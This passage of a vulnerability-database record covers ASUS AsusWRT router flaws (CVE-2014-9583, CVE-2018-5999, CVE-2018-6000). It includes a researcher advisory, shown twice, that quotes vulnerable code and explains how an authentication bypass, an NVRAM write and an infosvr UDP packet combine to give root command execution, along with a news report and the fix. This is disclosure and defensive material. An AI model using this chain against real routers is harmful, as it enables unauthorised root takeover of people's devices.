"LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-10000", "CVE-2014-9583"], "modified": "2018-04-27T01:29:00", "cpe": ["cpe:/o:asus:wrt_firmware:3.0.0.4.376_1071", "cpe:/o:t-mobile:tm-ac1900:3.0.0.4.376_3169", "cpe:/o:asus:wrt_firmware:3.0.0.4.376.2524-g0012f52"], "id": "CVE-2014-9583", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9583", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:asus:wrt_firmware:3.0.0.4.376.2524-g0012f52:*:*:*:*:*:*:*", "cpe:2.3:o:t-mobile:tm-ac1900:3.0.0.4.376_3169:*:*:*:*:*:*:*", "cpe:2.3:o:asus:wrt_firmware:3.0.0.4.376_1071:*:*:*:*:*:*:*"]}], "prion": [{"lastseen": "2023-11-22T04:16:40", "description": "common.c in infosvr in ASUS WRT firmware 3.0.0.4.376_1071, 3.0.0.376.2524-g0013f52, and other versions, as used in RT-AC66U, RT-N66U, and other routers, does not properly check the MAC address for a request, which allows remote attackers to bypass authentication and execute arbitrary commands via a NET_CMD_ID_MANU_CMD packet to UDP port 9999. NOTE: this issue was incorrectly mapped to CVE-2014-10000, but that ID is invalid due to its use as an example of the 2014 CVE ID syntax change.", "cvss3": {}, "published": "2015-01-08T20:59:00", "type": "prion", "title": "Authentication flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-10000", "CVE-2014-9583"], "modified": "2018-04-27T01:29:00", "id": "PRION:CVE-2014-9583", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2014-9583", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:05", "description": "\nAsusWRT Router 3.0.0.4.380.7743 - LAN Remote Code Execution", "cvss3": {}, "published": "2018-01-22T00:00:00", "type": "exploitpack", "title": "AsusWRT Router 3.0.0.4.380.7743 - LAN Remote Code Execution", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9583", "CVE-2018-5999", "CVE-2018-6000"], "modified": "2018-01-22T00:00:00", "id": "EXPLOITPACK:71928799B4AFACF08ED27F548C324480", "href": "", "sourceData": ">> Unauthenticated LAN remote code execution in AsusWRT\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\n=================================================================================\nDisclosure: 22/01/2018 / Last updated: 25/01/2018\n\n\n>> Background and summary\nAsusWRT is the operating system used in mid range and high end Asus routers. It is based on Linux, but with a sleek web UI and a slimmed down profile suitable for running on resource constrained routers.\nThankfully ASUS is a responsible company, and not only they publish the full source code as required by the GPL, but they also give users full root access to their router via SSH. Overall the security of their operating system is pretty good, especially when compared to other router manufacturers.\n\nHowever due to a number of coding errors, it is possible for an unauthenticated attacker in the LAN to achieve remote code execution in the router as the root user.\n\nA special thanks to Beyond Security SecuriTeam Secure Disclosure (SSD) programme for disclosing these vulnerabilities to the manufacturer, speeding the resolution of the issues discovered (see [1] for their advisory).\n\n\n>> Technical details:\n#1\nVulnerability: HTTP server authentication bypass\nCVE-2018-5999\nAttack Vector: Remote\nConstraints: None; exploitable by an unauthenticated attacker\nAffected versions: confirmed on v3.0.0.4.380.7743; possibly affects every version before v3.0.0.4.384.10007\n\nThe AsusWRT HTTP server has a flaw in handle_request() that allows an unauthenticated user to perform a POST request for certain actions.\nIn AsusWRT_source/router/httpd/httpd.c:\n\nhandle_request(void)\n{\n...\n\thandler->auth(auth_userid, auth_passwd, auth_realm);\n\tauth_result = auth_check(auth_realm, authorization, url, file, cookies, fromapp);\n\n\tif (auth_result != 0) <--- auth fails\n\t{\n\t\tif(strcasecmp(method, \"post\") == 0){\n\t\t\tif (handler->input) {\n\t\t\t\thandler->input(file, conn_fp, cl, boundary); <--- but POST request is still processed\n\t\t\t}\n\t\t\tsend_login_page(fromapp, auth_result, NULL, NULL, 0);\n\t\t}\n\t\t//if(!fromapp) http_logout(login_ip_tmp, cookies);\n\t\treturn;\n\t}\n...\n}\n\nThis can (and will) be combined with other vulnerabilities to achieve remote code execution.\n\n\n#2\nVulnerability: Unauthorised configuration change (NVRAM value setting)\nCVE-2018-6000\nAttack Vector: Remote\nConstraints: None; exploitable by an unauthenticated attacker\nAffected versions: confirmed on v3.0.0.4.380.7743; possibly affects every version before v3.0.0.4.384.10007\n\nBy abusing vulnerability #1 and POSTing to vpnupload.cgi, we can invoke do_vpnupload_post() in the HTTP server code, which has a vulnerability that allows an attacker to set NVRAM configuration values directly from the request.\nIn AsusWRT_source/router/httpd/web.c:\n\ndo_vpnupload_post(char *url, FILE *stream, int len, char *boundary)\n{\n...\n\tif (!strncasecmp(post_buf, \"Content-Disposition:\", 20)) {\n\t\tif(strstr(post_buf, \"name=\\\"file\\\"\"))\n\t\t\tbreak;\n\t\telse if(strstr(post_buf, \"name=\\\"\")) {\n\t\t\toffset = strlen(post_buf);\n\t\t\tfgets(post_buf+offset, MIN(len + 1, sizeof(post_buf)-offset), stream);\n\t\t\tlen -= strlen(post_buf) - offset;\n\t\t\toffset = strlen(post_buf);\n\t\t\tfgets(post_buf+offset, MIN(len + 1, sizeof(post_buf)-offset), stream);\n\t\t\tlen -= strlen(post_buf) - offset;\n\t\t\tp = post_buf;\n\t\t\tname = strstr(p, \"\\\"\") + 1;\n\t\t\tp = strstr(name, \"\\\"\");\n\t\t\tstrcpy(p++, \"\\0\");\n\t\t\tvalue = strstr(p, \"\\r\\n\\r\\n\") + 4;\n\t\t\tp = strstr(value, \"\\r\");\n\t\t\tstrcpy(p, \"\\0\");\n\t\t\t//printf(\"%s=%s\\n\", name, value);\n\t\t\tnvram_set(name, value);\n\t\t}\n\t}\n...\n}\n\nThese NVRAM values contain very important configuration variables, such as the admin password, which can be set in this way by an authenticated or unauthenticated attacker.\n\nOnce that is done, code execution is easily achieved. One option is to login to the web interface with the new password, enable SSH, reboot the router and login via SSH.\n\nA more elegant option is to abuse infosvr, which is a UDP daemon running on port 9999.\nThe daemon has a special mode where it executes a command received in a packet as the root user. This special mode is only enabled if ateCommand_flag is set to 1, which most likely only happens during factory testing or QA (it was not enabled by default in the firmware distributed by Asus in their website).\n\nHowever we can set ateCommand_flag to 1 using the VPN configuration upload technique described above and then send a PKT_SYSCMD to infosvr. The daemon will read a command from the packet and execute it as root, achieving our command execution cleanly - without changing any passwords.\n\n(Note: infosvr used to allow unauthenticated command execution without the ateCommand_flag being set, which led to Joshua Drake's (jduck) discovery of CVE-2014-9583, see [2]; this was fixed by Asus in early 2015).\n\nPacket structure (from AsusWRT_source/router/shared/iboxcom.h):\n- Header\n typedef struct iboxPKTEx\n {\n BYTE\t\tServiceID;\n BYTE\t\tPacketType;\n WORD\t\tOpCode;\n DWORD \t\tInfo; // Or Transaction ID\n BYTE\t\tMacAddress[6];\n BYTE\t\tPassword[32]; //NULL terminated string, string length:1~31, cannot be NULL string\n } ibox_comm_pkt_hdr_ex;\n\n- Body\n typedef struct iboxPKTCmd\n {\n WORD\t\tlen;\n BYTE\t\tcmd[420];\t\t<--- command goes here\n } PKT_SYSCMD;\t\t// total 422 bytes\n\nA Metasploit module exploiting this vulnerability has been released [3].\n\n\n>> Fix:\nUpgrade to AsusWRT v3.0.0.4.384.10007 or above.\nSee [4] for the very few details and new firmware released by Asus.\n\n\n>> References:\n[1] https://blogs.securiteam.com/index.php/archives/3589\n[2] https://github.com/jduck/asus-cmd\n[3] https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/asuswrt_lan_rce.rb\n[4] https://www.asus.com/Static_WebPage/ASUS-Product-Security-Advisory/\n\n================\nAgile Information Security Limited\nhttp://www.agileinfosec.co.uk/\n>> Enabling secure digital business >>", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2019-01-23T05:27:51", "description": "ASUS released patches for over a dozen router models on Tuesday that are each vulnerable to multiple firmware flaws that when combined give a local unauthenticated attacker the ability to execute commands as root on targeted devices.\n\nRouters models patched by ASUS are RT-AC88U, RT-AC3100, RT-AC86U, RT-AC68U and RT-AC66U. The flaw is related to ASUS firmware AsusWRT (versions before 3.0.0.4.384_10007), used in select models of the company\u2019s router lines.\n\n\u201cThe attack is done from the LAN side the network, as opposed to the WAN side. In other words, as far as we know you cannot exploit this from the internet,\u201d according to network security firm Beyond Security, that disclosed the vulnerabilities [earlier this week](<https://blogs.securiteam.com/index.php/archives/3589>). \u201cThis (attack) works for someone in the your LAN \u2013 even if they are on a guest network \u2013 and it may lead to remote command execution.\u201d\n\nThe two vulnerabilities are CVE-2018-6000 and CVE-2018-5999, a configuration manipulation flaw and a server authentication bypass flaw.\n\n\u201cDue to a number of coding errors, it is possible for an unauthenticated attacker in the LAN to achieve remote code execution in the router as the root user,\u201d [wrote researcher Pedro Ribeiro](<https://github.com/pedrib/PoC/blob/master/advisories/asuswrt-lan-rce.txt>) who discovered the flaw.\n\nThe first flaw (CVE-2018-5999) is tied to the ASUS router firmware and takes advantage of a weakness in the AsusWRT HTTP server and the way it handles requests via \u201chandle_request()\u201d which allows an unauthenticated user to perform a POST request for certain actions, according to Ribeiro.\n\n\u201cThis can (and will) be combined with other vulnerabilities to achieve remote code execution,\u201d he said.\n\nRibeiro describes the second bug (CVE-2018-6000 ) as an unauthorized configuration change flaw tied to the router\u2019s nonvolatile random access memory module (NVRAM).\n\n\u201cBy abusing vulnerability #1 and POSTing to vpnupload.cgi, we can invoke do_vpnupload_post() in the HTTP server code, which has a vulnerability (CVE-2018-5999) that allows an attacker to set NVRAM configuration values directly from the request,\u201d he said.\n\nAccording to Ribeiro\u2019s technical write up, the NVRAM values include the admin password. Therefore an attacker can manipulate, change or set NVRAM values such as the admin password to whatever they want.\n\n\u201cOnce that is done, code execution is easily achieved. One option is to login to the web interface with the new password, enable SSH, reboot the router and login via SSH,\u201d he said. SSH is shorthand for Secure Socket Shell, a network protocol that provides administrators (or attackers) a secure way to access a remote computer for remote management or manipulation.\n\nThe attack scenario can be varied, such as abusing ASUS\u2019 own service called \u201cinfosvr\u201d that listens on UDP broadcast port 9999 on the LAN or WLAN interface, writes Ribeiro. The infosvr services has also been a target of previous attack methods ([CVE-2014-9583](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9583>)).\n\nThe vulnerabilities were disclosed earlier this week by network security firm Beyond Security and were part of the company\u2019s SecuriTeam Secure Disclosure program.\n\nAccording to Beyond Security, ASUS was notified of the vulnerabilities on Nov. 22. Vulnerabilities are being patched by ASUS via automatic updates sent to affected routers, according to Beyond Security.\n\nA complete list of affected routers, according to ASUS, include:\n\nRT-AC88U 3.0.0.4.384_10007\n\nRT-AC3100 3.0.0.4.384_10007\n\nRT-AC86U 3.0.0.4.384_10007\n\nRT-AC68U series 3.0.0.4.384_10007 , also include RT-AC68U/ 68R/ 68W/ AC1900/ 68U_White/ 68P/ 1900P/ 1900U\n\nRT-AC66U_B1 series 3.0.0.4.384_10007, also include AC1750_B1\n", "cvss3": {}, "published": "2018-01-25T18:40:03", "type": "threatpost", "title": "ASUS Patches Root Command Execution Flaws Haunting Over a Dozen Router Models", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-9583", "CVE-2018-5999", "CVE-2018-6000"], "modified": "2018-01-25T18:40:03", "id": "THREATPOST:318D2AC145FDD81AA284239AD4ADB10D", "href": "https://threatpost.com/asus-patches-root-command-execution-flaws-haunting-over-a-dozen-router-models/129666/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2023-12-01T21:02:56", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-01-22T00:00:00", "type": "exploitdb", "title": "AsusWRT Router < 3.0.0.4.380.7743 - LAN Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2018-5999", "2018-6000", "CVE-2014-9583", "CVE-2018-5999", "CVE-2018-6000"], "modified": "2018-01-22T00:00:00", "id": "EDB-ID:43881", "href": "https://www.exploit-db.com/exploits/43881", "sourceData": ">> Unauthenticated LAN remote code execution in AsusWRT\r\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\r\n=================================================================================\r\nDisclosure: 22/01/2018 / Last updated: 25/01/2018\r\n\r\n\r\n>> Background and summary\r\nAsusWRT is the operating system used in mid range and high end Asus routers. It is based on Linux, but with a sleek web UI and a slimmed down profile suitable for running on resource constrained routers.\r\nThankfully ASUS is a responsible company, and not only they publish the full source code as required by the GPL, but they also give users full root access to their router via SSH. Overall the security of their operating system is pretty good, especially when compared to other router manufacturers.\r\n\r\nHowever due to a number of coding errors, it is possible for an unauthenticated attacker in the LAN to achieve remote code execution in the router as the root user.\r\n\r\nA special thanks to Beyond Security SecuriTeam Secure Disclosure (SSD) programme for disclosing these vulnerabilities to the manufacturer, speeding the resolution of the issues discovered (see [1] for their advisory).\r\n\r\n\r\n>> Technical details:\r\n#1\r\nVulnerability: HTTP server authentication bypass\r\nCVE-2018-5999\r\nAttack Vector: Remote\r\nConstraints: None; exploitable by an unauthenticated attacker\r\nAffected versions: confirmed on v3.0.0.4.380.7743; possibly affects every version before v3.0.0.4.384.10007\r\n\r\nThe AsusWRT HTTP server has a flaw in handle_request() that allows an unauthenticated user to perform a POST request for certain actions.\r\nIn AsusWRT_source/router/httpd/httpd.c:\r\n\r\nhandle_request(void)\r\n{\r\n...\r\n\thandler->auth(auth_userid, auth_passwd, auth_realm);\r\n\tauth_result = auth_check(auth_realm, authorization, url, file, cookies, fromapp);\r\n\r\n\tif (auth_result != 0) <--- auth fails\r\n\t{\r\n\t\tif(strcasecmp(method, \"post\") == 0){\r\n\t\t\tif (handler->input) {\r\n\t\t\t\thandler->input(file, conn_fp, cl, boundary); <--- but POST request is still processed\r\n\t\t\t}\r\n\t\t\tsend_login_page(fromapp, auth_result, NULL, NULL, 0);\r\n\t\t}\r\n\t\t//if(!fromapp) http_logout(login_ip_tmp, cookies);\r\n\t\treturn;\r\n\t}\r\n...\r\n}\r\n\r\nThis can (and will) be combined with other vulnerabilities to achieve remote code execution.\r\n\r\n\r\n#2\r\nVulnerability: Unauthorised configuration change (NVRAM value setting)\r\nCVE-2018-6000\r\nAttack Vector: Remote\r\nConstraints: None; exploitable by an unauthenticated attacker\r\nAffected versions: confirmed on v3.0.0.4.380.7743; possibly affects every version before v3.0.0.4.384.10007\r\n\r\nBy abusing vulnerability #1 and POSTing to vpnupload.cgi, we can invoke do_vpnupload_post() in the HTTP server code, which has a vulnerability that allows an attacker to set NVRAM configuration values directly from the request.\r\nIn AsusWRT_source/router/httpd/web.c:\r\n\r\ndo_vpnupload_post(char *url, FILE *stream, int len, char *boundary)\r\n{\r\n...\r\n\tif (!strncasecmp(post_buf, \"Content-Disposition:\", 20)) {\r\n\t\tif(strstr(post_buf, \"name=\\\"file\\\"\"))\r\n\t\t\tbreak;\r\n\t\telse if(strstr(post_buf, \"name=\\\"\")) {\r\n\t\t\toffset = strlen(post_buf);\r\n\t\t\tfgets(post_buf+offset, MIN(len + 1, sizeof(post_buf)-offset), stream);\r\n\t\t\tlen -= strlen(post_buf) - offset;\r\n\t\t\toffset = strlen(post_buf);\r\n\t\t\tfgets(post_buf+offset, MIN(len + 1, sizeof(post_buf)-offset), stream);\r\n\t\t\tlen -= strlen(post_buf) - offset;\r\n\t\t\tp = post_buf;\r\n\t\t\tname = strstr(p, \"\\\"\") + 1;\r\n\t\t\tp = strstr(name, \"\\\"\");\r\n\t\t\tstrcpy(p++, \"\\0\");\r\n\t\t\tvalue = strstr(p, \"\\r\\n\\r\\n\") + 4;\r\n\t\t\tp = strstr(value, \"\\r\");\r\n\t\t\tstrcpy(p, \"\\0\");\r\n\t\t\t//printf(\"%s=%s\\n\", name, value);\r\n\t\t\tnvram_set(name, value);\r\n\t\t}\r\n\t}\r\n...\r\n}\r\n\r\nThese NVRAM values contain very important configuration variables, such as the admin password, which can be set in this way by an authenticated or unauthenticated attacker.\r\n\r\nOnce that is done, code execution is easily achieved. One option is to login to the web interface with the new password, enable SSH, reboot the router and login via SSH.\r\n\r\nA more elegant option is to abuse infosvr, which is a UDP daemon running on port 9999.\r\nThe daemon has a special mode where it executes a command received in a packet as the root user. This special mode is only enabled if ateCommand_flag is set to 1, which most likely only happens during factory testing or QA (it was not enabled by default in the firmware distributed by Asus in their website).\r\n\r\nHowever we can set ateCommand_flag to 1 using the VPN configuration upload technique described above and then send a PKT_SYSCMD to infosvr. The daemon will read a command from the packet and execute it as root, achieving our command execution cleanly - without changing any passwords.\r\n\r\n(Note: infosvr used to allow unauthenticated command execution without the ateCommand_flag being set, which led to Joshua Drake's (jduck) discovery of CVE-2014-9583, see [2]; this was fixed by Asus in early 2015).\r\n\r\nPacket structure (from AsusWRT_source/router/shared/iboxcom.h):\r\n- Header\r\n typedef struct iboxPKTEx\r\n {\r\n BYTE\t\tServiceID;\r\n BYTE\t\tPacketType;\r\n WORD\t\tOpCode;\r\n DWORD \t\tInfo; // Or Transaction ID\r\n BYTE\t\tMacAddress[6];\r\n BYTE\t\tPassword[32]; //NULL terminated string, string length:1~31, cannot be NULL string\r\n } ibox_comm_pkt_hdr_ex;\r\n\r\n- Body\r\n typedef struct iboxPKTCmd\r\n {\r\n WORD\t\tlen;\r\n BYTE\t\tcmd[420];\t\t<--- command goes here\r\n } PKT_SYSCMD;\t\t// total 422 bytes\r\n\r\nA Metasploit module exploiting this vulnerability has been released [3].\r\n\r\n\r\n>> Fix:\r\nUpgrade to AsusWRT v3.0.0.4.384.10007 or above.\r\nSee [4] for the very few details and new firmware released by Asus.\r\n\r\n\r\n>> References:\r\n[1] https://blogs.securiteam.com/index.php/archives/3589\r\n[2] https://github.com/jduck/asus-cmd\r\n[3] https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/asuswrt_lan_rce.rb\r\n[4] https://www.asus.com/Static_WebPage/ASUS-Product-Security-Advisory/\r\n\r\n================\r\nAgile Information Security Limited\r\nhttp://www.agileinfosec.co.uk/\r\n>> Enabling secure digital business >>", "sourceHref": "https://www.exploit-db.com/raw/43881", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}

ASUS Router infosvr Service Remote Command Execution Vulnerability

Description

Related